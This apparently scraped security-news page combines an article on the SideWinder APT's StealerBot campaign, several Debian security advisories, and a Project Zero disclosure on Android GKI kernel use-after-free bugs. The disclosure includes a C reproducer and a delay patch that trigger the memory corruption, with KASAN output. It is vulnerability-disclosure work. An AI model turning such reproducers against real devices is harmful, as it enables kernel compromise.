An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa.
The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.
"

An advanced persistent threat (APT) actor with suspected ties to India has sprung forth with a flurry of attacks against high-profile entities and strategic infrastructures in the Middle East and Africa.

The activity has been attributed to a group tracked as SideWinder, which is also known as APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04.

"The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations," Kaspersky researchers Giampaolo Dedola and Vasily Berdnikov said.

Targets of the attacks include government and military entities, logistics, infrastructure and telecommunications companies, financial institutions, universities, and oil trading companies located in Bangladesh, Djibouti, Jordan, Malaysia, the Maldives, Myanmar, Nepal, Pakistan, Saudi Arabia, Sri Lanka, Turkey, and the U.A.E.

SideWinder has also been observed setting its sights on diplomatic entities in Afghanistan, France, China, India, Indonesia, and Morocco.

The most significant aspect of the recent campaign is the use of a multi-stage infection chain to deliver a previously unknown post-exploitation toolkit called StealerBot.

It all commences with a spear-phishing email with an attachment – either a ZIP archive containing a Windows shortcut (LNK) file or a Microsoft Office document – that, in turn, executes a series of intermediate JavaScript and .NET downloaders to ultimately deploy the StealerBot malware.

The documents rely on the tried-and-tested technique of remote template injection to download an RTF file that is stored on an adversary-controlled remote server. The RTF file, for its part, triggers an exploit for CVE-2017-11882, to execute JavaScript code that's responsible for running additional JavaScript code hosted on mofa-gov-sa.direct888\[.\]net.

On the other hand, the LNK file employs the mshta.exe utility, a Windows-native binary designed to execute Microsoft HTML Application (HTA) files, to run the same JavaScript code hosted on a malicious website controlled by the attacker.

The JavaScript malware serves to extract an embedded Base64-encoded string, a .NET library named "App.dll" that collects system information and functions as a downloader for a second .NET payload from a server ("ModuleInstaller.dll").

ModuleInstaller is also a downloader, but one that's equipped to maintain persistence on the host, execute a backdoor loader module, and retrieve next-stage components. But in an interesting twist, the manner in which they are run is determined by what endpoint security solution is installed on the host.

"The Bbckdoor loader module has been observed since 2020," the researchers said, pointing out its ability to evade detection and avoid running in sandboxed environments. "It has remained almost the same over the years."

"It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension."

The end goal of the attacks is to drop StealerBot via the Backdoor loader module. Described as a .NET-based "advanced modular implant," it is specifically geared to facilitate espionage activities by fetching several plugins to -

*   Install additional malware using a C++ downloader
*   Capture screenshots
*   Log keystrokes
*   Steal passwords from browsers
*   Intercept RDP credentials
*   Steal files
*   Start reverse shell
*   Phish Windows credentials, and
*   Escalate privileges bypassing User Account Control (UAC)

"The implant consists of different modules loaded by the main 'Orchestrator,' which is responsible for communicating with the \[command-and-control\] and executing and managing the plugins," the researchers said. "The Orchestrator is usually loaded by the backdoor loader module."

Kaspersky said it detected two installer components – named InstallerPayload and InstallerPayload\_NET – that don't feature as part of the attack chain, but are used to install StealerBot to likely update to a new version or infect another user.

The expansion of SideWinder's geographic reach and its use of a new sophisticated toolkit comes as cybersecurity company Cyfirma detailed new infrastructure running the Mythic post-exploitation framework and linked to Transparent Tribe (aka APT36), a threat actor believed to be of Pakistani origin.

"The group is distributing malicious Linux desktop entry files disguised as PDFs," it said. "These files execute scripts to download and run malicious binaries from remote servers, establishing persistent access and evading detection."

"APT36 is increasingly targeting Linux environments due to their widespread use in Indian government sectors, particularly with the Debian-based BOSS OS and the introduction of Maya OS."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SideWinder APT Strikes Middle East and Africa With Stealthy Multi-Stage Attack

Debian Linux Security Advisory 5792-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Hafiizh and YoKo Kho discovered that visiting a malicious website may lead to address bar spoofing. Narendra Bhati discovered that a malicious website may exfiltrate data cross-origin.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5792-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
October 14, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-40866 CVE-2024-44187

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-40866

    Hafiizh and YoKo Kho discovered that visiting a malicious website  
    may lead to address bar spoofing.

CVE-2024-44187

    Narendra Bhati discovered that a malicious website may exfiltrate  
    data cross-origin.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.46.0-2~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmcNkVcACgkQAAyEYu0C  
2AIS8g/9EKZzBT0VW5VA4kCzLSijtpyKw+kDKgVbsFQmDudoYfr1xF1syfyw1y9r  
RwdUi5q2puDKenEBk1kg3xRUkVM0HCbzCVt/h6mmx6YaBjKVAl95syXiWyDnXoOI  
7e4WnzAtUgsNfx4+zpTqNdfK/982C/Zfc2kuit2iXiBDcCYtdBWV3+k8vbbT4Om5  
2MYrbxlQlyUXEc9ZZpaAUxTvuklSQ2wHK3xtlAmoxsMdj2+Re9bOKuBuOKZkUfwU  
9olgKg83HWhzc5W4u840q8oHmUrZDUpNbLjQGTSBZWVQE0uAiD8IA8k4I/TxjPFm  
MyeSRKKE0QTCOPDyHskVW+ijjcqs8pHa9/jAwXO/cBO6ZBkSbnQZ57j4+CQtrzA5  
N0Yh02AM48898eRDXhlt2SBz+tQnlhs0vSRMacccbIy0GSlccSoiaJRsUFXZ+LOb  
JiM8xlbJ8KsKJz/pTOM6qzrIkD/RFmqBrxIutPqsusG+XbiVQkvcQp13otfTK8Pk  
hzGC47UBZuuUib8DXkYSgbb0b/cw6/efIwy60NpPsT7DxfjLwCyVspyQcjJplGAN  
Lou0R6ezpNQu9iijjeJZR6DouiYP0YGoLm8bVo0OBIsw0tmO7vZ82SBi6Rf7ScIB  
Hu190dDPt2WdNigXxpGmjk+nWyj7DncEZEfwKQb/rZos52hPh/Q=  
=pvja  
-----END PGP SIGNATURE-----

Debian Security Advisory 5792-1

Debian Linux Security Advisory 5791-1 - Elyas Damej discovered that a sandbox mechanism in ReportLab, a Python library to create PDF documents, could be bypassed which may result in the execution of arbitrary code when converting malformed HTML to a PDF document.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5791-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : python-reportlabCVE ID         : CVE-2023-33733Elyas Damej discovered that a sandbox mechanism in ReportLab, a Pythonlibrary to create PDF documents, could be bypassed which may result inthe execution of arbitrary code when converting malformed HTML to a PDFdocument.For the stable distribution (bookworm), this problem has been fixed inversion 3.6.12-1+deb12u1.We recommend that you upgrade your python-reportlab packages.For the detailed security status of python-reportlab please refer toits security tracker page at:https://security-tracker.debian.org/tracker/python-reportlabFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMDm4ACgkQEMKTtsN8Tja2Lw//RW9W1X/NuzRQKUmUf+5jPBY48jOsfoOCjJTEUXSjptjP0m5QA/xsd78b2C4Eq9SooafXXPufiJGbtYs0CP4Xvuok/G1rPkgpcZPYQ2m9Bbcrp6JAMrb/CeAumsuBCQc7IgaCz8AkMh81JxNy5CqVvh9EJdKgZYyviT7wa5Bqyx6TBicfQHdZ8bNk6xQqh0S3+rzkKoau9YE0rYWRZ/AOLki5PUGqsEJOzXFpwn4Ahvk/pBCTra7E/k0oL2bUmVSFtTJcdowtofbh/c9K8ZQmI0k8CMU82LU4cTaV6UjK+498JWpQLl6uq5RISKppR3I5tsk+DVAve4ek1yAyXNrgscm1u62IxSDQpuBc3GgW6cN5nrKYHoALdnjiRD+8OSChTIOpbVSZ4y9tUFU7mHRoVkne4pNohujV/8M1umupJ108nXA34avR+B7DsResI70m19/ocLR5uH1v/rGO4FUrSfAKgOYBR8ryO/YcbDROixyOHFN7vxCUxXF3UPc3uPVuQilHOCi0w+S4JxcLywFXoDIj1qtGlzKA9rtAMA6okHILJKCy43lEo+36nr0WZMZuF7kDQLPkpb1+6zf3Mxwj8QrpRFCT+DYyLfg5MLYLM4Trbavtpk/faXQoP+pLMfjIaq8Nrd7/UOXFQXWFSUh8YwOm99je9zr1Am35zftZnNU==MICC-----END PGP SIGNATURE-----

Debian Security Advisory 5791-1

Debian Linux Security Advisory 5790-1 - It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG was susceptible to nesting-based mXSS.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5790-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 13, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : node-dompurifyCVE ID         : CVE-2024-47875It was discovered that DOMPurify, a sanitizer for HTML, MathML and SVG wassusceptible to nesting-based mXSS.For the stable distribution (bookworm), this problem has been fixed inversion 2.4.1+dfsg+~2.4.0-2.We recommend that you upgrade your node-dompurify packages.For the detailed security status of node-dompurify please refer toits security tracker page at:https://security-tracker.debian.org/tracker/node-dompurifyFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcMCGEACgkQEMKTtsN8TjZW5g//Uc2ZeYTX4O8kHZ9IHHL7v9n6pxPG9MLYgiMt11YSs5k6qVT20NvqfWWyN9ZNQkBCtYpKRO3wym5AcfR9UsZxVh3AlT8Q+Y7lHBYxiaQw82ygNQT2nAU32wBSMHnZvjHEAdH/iZWeR2VROVHjwR7bU9cbzc2/dVt1W7WJTLPY8lAqAAJ5D4/6Nlcb1JMwupP1XIW26gSYBGx+RXuKitSr1jKBoraDtAGUtpZQMP7JwKXt+WSLe4mStXwQmQhMkmNd28sonJVAEl/EjvZq1KuEONlj5doPMtMC9eU7HBtXu6b2JoPVyO6FZnx76lMqT+JV9VIqj1MfJofLSv4kT8PfM18KaNHBqtiR370D0q6gxfQxIibvu4WXPmG8CNw/ew4LRwswQMQPSscEGdo8jz3WKhKnLMB6HRWg0m9LMJXQcmNLPiAS8NIcOSDtK8sQC8ODIjR1lYzetnu7Y6o69KWdreFVlHgaWqROfBtxmQ0cf4vBQchZd3cCRsFHtPQ2xsNsbIQoJhst2XzJsNVlgcB78qMiKfc7fsZh7/Uy0oq2jclSA1nWQUoszFblTVCn44fLIS97bn2WggiAqUymBBSyAGeZp//6CuoYik62ARHW5tYXvsa1oq9/d/I5RcBMbNHn2VNyxmzpnkbaFFYS/Sz86ihL17Ao7IOD8ssvaHzGeTw==lKMx-----END PGP SIGNATURE-----

Debian Security Advisory 5790-1

Debian Linux Security Advisory 5789-1 - Multiple security issues were discovered in Thunderbird, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5789-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 12, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : thunderbirdCVE ID         : CVE-2024-9392 CVE-2024-9393 CVE-2024-9394 CVE-2024-9401                  CVE-2024-9680Multiple security issues were discovered in Thunderbird, which couldresult in the execution of arbitrary code.For the stable distribution (bookworm), these problems have been fixed inversion 1:115.16.0esr-1~deb12u1.We recommend that you upgrade your thunderbird packages.For the detailed security status of thunderbird please refer toits security tracker page at:https://security-tracker.debian.org/tracker/thunderbirdFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcKScgACgkQEMKTtsN8TjZxqg/+IotH08Pw5gFZxPLZ0XmP72798ftJNHzws+5sBYSf66i/W3vcWy51fHZUMSzQ/rJE0b/FappKSzBVrKZyrm1JWvkEOMGa72fUTXcGcbvVn68XbFrZCYHs5ec/ErU3j++tQeKXCIt6JOmwZlbz0gEbFv3W3JUpPpkrp+8ZnWHd8e6dmG56yYfzNATIMAb25Emw1W8aSivopokv96X5FpuzCpVllzgJgwURCQdZhbLaoLfoHWhHPSsRIK2MCxN3isjS/b41D1wHM9dO2gQ7Yp1d4rWMooSk2fKG5hub2lZbJ3SmVmf0UQcQssXsBy+FTU9g+01VUXwKVUKpmJ9TKakGdwaBBlHo1Y5OzAJf0XZl2TrTGCbsAn+wjLH5TxX2HMiBIiEKRn2QkJP4nzExWVy2Xj07XpuI9YMnP4ZAxjNJkZXcE9kDgL9x6qrXW9Lh4W2APbW9WG5o3J+HZLs7/7dv8jbhbtekaAjVFK6Ex09iTB0HNo3GBoFgwTA0MloSPy933aYhyZh1LA/h7OjJ9+mHUQdjAe8bDyRVNItX1U0/E34KA2KwbK9fis/DIxNAQzdKYyGoFrjnT3rnv/gPMGB+5cbhNyIo3lWnKMqigu5xJJMhAbBmrvP15cIo2jF6oDwpAFh5a9q35ElTOOq5CJBqIg92r95DlLB6Em4iMM3t/gs==CztN-----END PGP SIGNATURE-----

Debian Security Advisory 5789-1

Debian Linux Security Advisory 5788-1 - Damien Schaeffer discovered a use-after-free in the Mozilla Firefox web browser, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5788-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 10, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-9680Damien Schaeffer discovered a use-after-free in the Mozilla Firefox webbrowser, which could result in the execution of arbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 128.3.1esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcH/n8ACgkQEMKTtsN8TjYY2xAAiU75PrzOQQ5nku0M0yvcPSpvHPY87erXxc1sAdV/vCSMqygCmkfwRzytDmEqwYwBlHNLSbqOPNYL4bmaj7yzJYfQPqI6hQxr0DMMPY3H3wLyHqMWgfnkoyyyntMys2zU0ZNwGa14KVdyrjnoE13wlhbHY4cJkZU1dhehxRMQEDmAmIwmsXx646/ecVFSJdEp0Wm9muDy9F2dI50YSyPrWwj8zbhqC72qNzGgDHQtiCEcMNaEvDoi48VFMxMGe5EOS6G993R5Hi2rcsd7fyE9/0fWCeZ7JUiXq/inXCcQusV7monLrP7Yy29gROgoj5smz9MMGS3viDblSf+o1P7F3hUqePE5HLvMSiJgXMtMMdD+j4aSYyApmkqFhHpY2zHZpVHK0lZWS+gneVHZZBLmTUVN/T81GQnsHGSHMIucSrMOc78qSruf5khZo2Xl0HIyrCvCYsmjPLhcWBnBQjgW20wtC6mKWWTKQOsMBISppORbJYXSEJbVDaAsbNp5Yvj7SrywjdzzzFK60BkGUFCNoqmtm0oharUtt3R/uZJ+Ta2KG7r6SsHg9T/cQOnx6l/r946bBNzTtk6ifGQRVa4ScVeLF1Ar6GZSgb3fMCJE340U8/UJ/LXj/5kfiva5oYg0Y57zDVh0whBJgyQk+h5rh+AXOILyF67u7mYLaZ/bpSk==z+e7-----END PGP SIGNATURE-----

Debian Security Advisory 5788-1

Debian Linux Security Advisory 5787-1 - Security issues were discovered in Chromium which could result in the execution of arbitrary code, denial of service, or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5787-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonOctober 09, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-9602 CVE-2024-9603Security issues were discovered in Chromium which could resultin the execution of arbitrary code, denial of service, or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 129.0.6668.100-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmcGuh0ACgkQZF0CR8NudjdP/w/6Apzn8iDKtKPttv+lXU07odw69w18PpHAhgCDgBBScoPM2caX/aBqL0yn8cHZf/aviZVocGgBHgqOn24TAdn8dv0chqpL6wGVumrEMiCuZC6cUFoKZpreembZMKjOFaYYWwKGq1abB65h043lYj5nbpKYKbYpy7sj+foyuTvY9n/d+Lb9L8TMSYqyo4wp+maehWy1aG5KwqSw2tKzKWef6txBxOD7HJ+2M2mG7Ml2d8YR8mxrCGupZCSLay4z8Hf6v0rQh7Xg7X9iAnnrJklmIAoXyV7oKXuE62lo0ElfJ3pyGZh7Ks/nxpp+Z2Vk7XK95EMlnre2FNell6Ut7IMBxFjKBh+QF4SVoe2vqBsiU/yryQrL12bbCIQvGijMfnSd+7j4XklD0zTfaSziWxeX4RXXH31YGbEkAtCcv+TldnTX5qmNp6wAG5H5JFafZ5P+bQ8+AO6WYlUAFPDG6GeWOPjGSZzAJKDzYIT3Yvw9zZKGgWQn1OXLCle2sXOU3d6rKnL0tOqAObEZydINE2YlTo7W23MbFNqqgQQS6I0iQZn1tL34rZacxKVhHTSikiat7p3p5o9RN+e7mA+kvh9ot113e1Ri14k7vyEYzlZp0Rt4vZtifnavtkVWPpPCG26NAQDIuPpCeM/dUJYs0nDqZe5Mce7qMcm68+vTMr34z00==QEGj-----END PGP SIGNATURE-----

Debian Security Advisory 5787-1

Android GKI kernels contain broken non-upstream Speculative Page Faults MM code that can lead to use-after-free conditions.

    A central recurring theme in Linux MM development is that contention on themmap lock can have a big negative performance impact on multithreaded workloads:If one thread is holding the mmap lock in exclusive mode for an extended amountof time, other threads will block as soon as they try to handle a page fault.Therefore there is a bunch of work to downgrade exclusive lock holders tonon-exclusive lock holders, shrink critical sections, and avoid holding the lockaltogether in some cases.One proposal to avoid holding the mmap lock in page fault handling are"Speculative page faults (SPF)"; here's a patch series from 2019 that had alreadygone through 11 rounds of review:https://lore.kernel.org/lkml/20190416134522.17540-1-ldufour@linux.ibm.com/t/This patch series didn't land at the time; but something along those lines mightland upstream in the next few years.But for some reason, Android decided that they need speculative page faultsimmediately, and merged the patches that were discussed on the upstream mailinglist into their GKI kernels. This is problematic for two reasons:A) The MM code is complicated and easy to get wrong.If you run MM code that has not been through the fuzzing, testing and reviewthat committed upstream code gets, there's a higher chance of undiscoveredbugs.B) The SPF patches **change the rules** that MM code has to follow, so nowAndroid's version of MM has different rules than upstream MM.This means that any patches in vaguely related parts of upstream MM need tobe checked by an Android engineer to see if they conflict with Android'sspecial rules.As far as I can tell, there are a bunch of memory safety bugs in the SPF versionthat is currently in AOSP's android13-5.10 branch (at commit 232bdcbd660b):    handle_pte_fault() calls pmd_none() without protection against concurrent    page table deletion, leading to UAF read.    do_anonymous_page() calls pte_alloc() without protection against concurrent    page table deletion, leading to UAF write.    do_anonymous_page() calls pmd_trans_unstable() without protection against    concurrent page table deletion, leading to UAF read.    do_swap_page() -> migration_entry_wait() -> __migration_entry_wait() operates    on a page table without protection against concurrent page table deletion,    leading to use-after-union-change read+write in struct page (on the page    table lock) and use-after-free read of a page table entry (resulting in bogus    page* calculation)    do_wp_page() calls handle_userfault() without protection against concurrent    userfaultfd_release(), leading to UAF reads of some flags from    userfaultfd_ctx.    I think back when the SPF series was posted upstream, there might have been    sufficient protection against this (because ___handle_speculative_fault()    bails on VMAs with VM_UFFD_MISSING), but since then the WP userfaultfd    support was added, and ___handle_speculative_fault() doesn't bail on    VM_UFFD_WP. do_wp_page() also doesn't check the cached VMA flags, it uses    userfaultfd_pte_wp() which reads flags from the VMA.    The way seqcounts are used to detect concurrent writers looks wrong.    The seqcount API requires that only one writer at a time can be in a    vm_write_begin() / vm_write_end() section, but these helpers are used in    codepaths that only hold the mmap lock in shared mode, so there can be    concurrent writers.    As far as I can tell, this means that when there are an even number of    concurrent writers, it will look as if there are no active writers.    This probably doesn't have much security impact because all of the places    that do vm_write_begin() where concurrency would be an actual problem seem to    hold the mmap lock in exclusive mode?As an example, I tested https://crbug.com/project-zero/2. To reproduce this easily, I patched an extradelay into the kernel:diff --git a/mm/memory.c b/mm/memory.c  index 83b715ed65775..35ce412d0a965 100644  --- a/mm/memory.c  +++ b/mm/memory.c  @@ -84,6 +84,8 @@   #include <asm/tlb.h>   #include <asm/tlbflush.h>     +#include <linux/delay.h>  +   #include "pgalloc-track.h"   #include "internal.h"     @@ -3819,6 +3821,12 @@ static vm_fault_t do_anonymous_page(struct vm_fault \*vmf)          vm_fault_t ret = 0;          pte_t entry;     +       if (strcmp(current->comm, "SLOWME") == 0 && (vmf->flags & FAULT_FLAG_SPECULATIVE)) {  +               pr_warn("%s: BEGIN DELAY 0x%lx\n", __func__, vmf->address);  +               mdelay(2000);  +               pr_warn("%s: END DELAY 0x%lx\n", __func__, vmf->address);  +       }  +          /\* File mapping without ->vm_ops ? \*/          if (vmf->vma_flags & VM_SHARED)                  return VM_FAULT_SIGBUS;  Then, I ran this testcase on an x86 build with ASAN and CONFIG_PREEMPT:#define _GNU_SOURCE  #include <pthread.h>  #include <err.h>  #include <unistd.h>  #include <sys/prctl.h>  #include <sys/mman.h>    // basic idea:  // delete the 1G-covering page table while do_anonymous_page() is at its entry  // point    #define VMA_ADDR ((void\*)0x40000000UL)  #define VMA_SIZE (0x40000000UL)    #define SYSCHK(x) ({          \    typeof(x) __res = (x);      \    if (__res == (typeof(x))-1) \      err(1, "SYSCHK(" #x ")"); \    __res;                      \  })    static void \*thread_fn(void \*dummy) {    SYSCHK(prctl(PR_SET_NAME, "SLOWME"));    \*(volatile char \*)VMA_ADDR;    SYSCHK(prctl(PR_SET_NAME, "spfthread"));  }    int main(void) {    SYSCHK(mmap(VMA_ADDR, VMA_SIZE, PROT_READ|PROT_WRITE,                          MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));    SYSCHK(madvise(VMA_ADDR, VMA_SIZE, MADV_NOHUGEPAGE));    // create anon_vma and page tables    \*(volatile char \*)(VMA_ADDR+0x1000) = 1;      pthread_t thread;    if (pthread_create(&thread, NULL, thread_fn, NULL))      errx(1, "pthread_create");      sleep(1);    munmap(VMA_ADDR, VMA_SIZE);      if (pthread_join(thread, NULL))      errx(1, "pthread_join");    return 0;  }  This first results in a UAF read of a PTE:do_anonymous_page: BEGIN DELAY 0x40000000  do_anonymous_page: END DELAY 0x40000000  ==================================================================  BUG: KASAN: use-after-free in handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   Read of size 8 at addr ffff88800f358000 by task SLOWME/724    CPU: 12 PID: 724 Comm: SLOWME Not tainted 5.10.107-00033-g232bdcbd660b-dirty #215  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014  Call Trace:  dump_stack_lvl (lib/dump_stack.c:120)   [...]  print_address_description.constprop.0 (mm/kasan/report.c:257)   [...]  [...]  kasan_report.cold (mm/kasan/report.c:444 mm/kasan/report.c:460)   [...]  handle_pte_fault (./arch/x86/include/asm/pgtable_types.h:394 ./arch/x86/include/asm/pgtable.h:823 mm/memory.c:3844 mm/memory.c:4687)   [...]  ___handle_speculative_fault (./include/linux/memcontrol.h:686 mm/memory.c:5106)   [...]  __handle_speculative_fault (mm/memory.c:5148)   [...]  do_user_addr_fault (arch/x86/mm/fault.c:1320)   [...]  exc_page_fault (./arch/x86/include/asm/irqflags.h:157 arch/x86/mm/fault.c:1470 arch/x86/mm/fault.c:1518)   [...]  asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:571)   RIP: 0033:0x55d52bfe41fb  Then pte_alloc() tries to lock the page table entry:BUG: KASAN: use-after-free in do_raw_spin_lock (kernel/locking/spinlock_debug.c:83 kernel/locking/spinlock_debug.c:112)   Read of size 4 at addr ffff88801a730004 by task SLOWME/724  and after that, it will write into the freed page table.From a security perspective, my recommendation is to fix this by reverting thespeculative page fault patches out of the GKI trees, since I believe that sucha divergence from upstream semantics is not maintainable. Looking through thecommit history of the AOSP android13-5.10 kernel branch also shows that a seriesof bugs have already been discovered that were introduced by SPF:81a1ae6b4395a ANDROID: mm: unlock the page on speculative fault retry88e4dbaf592d8 ANDROID: Make MGLRU aware of speculative faults320ffbea77113 ANDROID: mm: Fix page table lookup in speculative fault path729a79f366e5e ANDROID: fix mmu_notifier race caused by not taking mmap_lock during SPFc3cbea92297d5 ANDROID: mm: avoid writing to read-only elementsdd3f538bf715c ANDROID: x86/mm: fix vm_area_struct leak in speculative pagefault handlingcf397c6c269ac ANDROID: mm: sync rss in speculative page fault path531f65ae67382 ANDROID: mm: Fix sleeping while atomic during speculative page faultThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2023-02-01.Please note that, according to our disclosure policy, if Project Zero discoversa variant of a previously reported Project Zero bug, technical details of thevariant will be added to the existing Project Zero report (which may be alreadypublic) and the report will not receive a new deadline.Project Zero will consider new race conditions where the SPF fault path accessespage tables or the VMA without sufficient locking variants of this issue.This includes issues that are introduced after this bug is reported.For more details, seehttps://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html.Related CVE Number: CVE-2023-20937.Discovered By jannh

Android GKI Kernels Use-After-Free

Debian Linux Security Advisory 5729-2 - The fixes for CVE-2024-38474 and CVE-2024-39884 introduced two regressions in mod_rewrite and mod_proxy.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5729-2                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
October 08, 2024                      https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : apache2  
Debian Bug     : 1079172 1079206

The fixes for CVE-2024-38474 and CVE-2024-39884 introduced two  
regressions in mod_rewrite and mod_proxy.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.4.62-1~deb12u2.

We recommend that you upgrade your apache2 packages.

For the detailed security status of apache2 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/apache2

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcFlPAACgkQEMKTtsN8  
TjYXsBAAmEc/DBZN7SjocvWn5mSLFhHmn5amtaEYfQrmkvS6bDWIGK91ezydYmGW  
CqvkIanyCPmx1d79kSlwGySNRxK1bb0JYhgblN6nwV7DlCqL08xELh1zn94nx8HG  
v0YhrHN769P44weq96x/84lc+PImolKv8UB6CkJX5OvcSoDV01XtxvX4ynWsAoUd  
9N7yB6MZL+6znCY08TLvuVE/5bDfXuM/u0sabIvuSRbrVVuShmznmeXbuULAc9y7  
POfmXCAdMM0znyM+ZxxLO9ou9bUP2kJJvRT+M8mo872s/8bbUmRPPkw+SNWFcJTV  
ShcWze2fh27B7Rpd3yCrItqXZwoojQUKX4lsYbk6BVy4RLWEuyeLB9Mhm23tO0uO  
8jYGEbgD/6vnhVTsIpVCKMiv3Q0IPvrUQnkF3LKxtoiVolgkcpzAU3q9ZtFfHAjJ  
8dhIe2GyUJaJ6Ajnl14n1ffycNdc1giKNlNsoFFphEFyvuQIu3Bf+IajDHIN41JQ  
h379u0znHIE53P1O6rhKG1F9j7SYq1FKkKgdqgjXGXnbYV9uBnpg2bWX9ilCDiYm  
i+rWI3CRBVDt7tuTt0M1z6PF1GV44thrTDTjT8TTc8VsNDcCdZHWWHw2PVzRpA3R  
/9OFQH8icMPs1Z/xPychUn0VSO+Iijp2qFT1/IlqUu7LoFdTz80=  
=tQ62  
-----END PGP SIGNATURE-----

Debian Security Advisory 5729-2

Microsoft has released security updates to fix a total of 118 vulnerabilities across its software portfolio, two of which have come under active exploitation in the wild.
